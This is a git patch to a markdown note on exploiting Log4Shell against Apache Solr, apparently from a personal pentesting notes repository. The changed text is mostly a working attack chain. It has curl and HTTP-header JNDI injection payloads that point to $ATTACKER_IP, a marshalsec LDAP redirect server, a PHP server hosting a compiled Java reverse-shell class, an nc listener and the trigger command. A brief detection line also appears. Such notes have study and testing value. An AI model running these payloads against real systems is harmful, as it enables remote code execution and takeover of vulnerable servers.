From 9d24689b42ddc6076a47df47ea5d40ba281ef51a Mon Sep 17 00:00:00 2001
From: whx <stefan@stefan.works>
Date: Tue, 14 Dec 2021 01:20:25 +0100
Subject: [PATCH] typos

---
 exploit/java/log4shell.md | 33 +++++++++++++++++++--------------
 1 file changed, 19 insertions(+), 14 deletions(-)

diff --git a/exploit/java/log4shell.md b/exploit/java/log4shell.md
index 1efe6ad..65b8e98 100644
--- a/exploit/java/log4shell.md
+++ b/exploit/java/log4shell.md
@@ -20,23 +20,19 @@ ${java:version}
 
 ## POC
 ```sh
-curl 'http://<target-IP>:8983/solr/admin/cores?foo=?$\{jndi:ldap://<attacker-IP>:4449\}'
+curl 'http://$TARGET:8983/solr/admin/cores?foo=?$\{jndi:ldap://$ATTACKER_IP:4449\}'
+```
+* Use HTTP header field as storage for payload or any other possible input field
+```HTTP
+X-Forwarded-For: ${jndi:ldap://$ATTACKER_IP:1389/foo}
 ```
 
 ## Usage
 
-* Fuzz endpoints to applicate the exploit
-* Use HTTP header field as storage for payload as well as any other possible input field 
-```HTTP
-X-Forwarded-For: ${jndi:ldap://<attacker-IP>:1389/foo}
-```
-
+* Fuzz endpoints to applicate the exploit on
 * Clone and build [marshallsec](https://github.com/mbechler/marshalsec) via `mvn clean package -DskipTests`
 * Java version should be the same as the one on the target
-* Redirect LDAP server to HTTP server
-```sh
-java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://$ATTACKER_IP:8000/#Exploit"
-```
+* A Proxy LDAP server to an HTTP server is needed
 
 * Compile following Java reverse shell via `javac Exploit.java -source 8 -target 8` to Exploit.class
 ```sh
@@ -50,9 +46,18 @@ public class Exploit {
     }
 }
 ```
-* Open reverse shell on `4449`
-* `curl 'http://.10.43.243:8983/solr/admin/cores?foo=$\{jndi:ldap://$ATTACKER_IP:1389/Exploit\}'`
+* Run the LDAP, HTTP and reverse shell
+```sh
+java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://$ATTACKER_IP:8000/#Exploit"
+```
+```sh
+php -S 0.0.0.:8000
+```
+```sh
+nc -lvnp 4449
+```
 
+* Trigger via `curl 'http://$TARGET:8983/solr/admin/cores?foo=$\{jndi:ldap://$ATTACKER_IP:1389/Exploit\}'`
 
 ## Detection
 
@@ -63,7 +68,7 @@ public class Exploit {
 
 * Parse logs for `jndi`
 
-## Bypasses 
+## Obfuscation 
 
 * Possible bypasses are as follows
 ```sh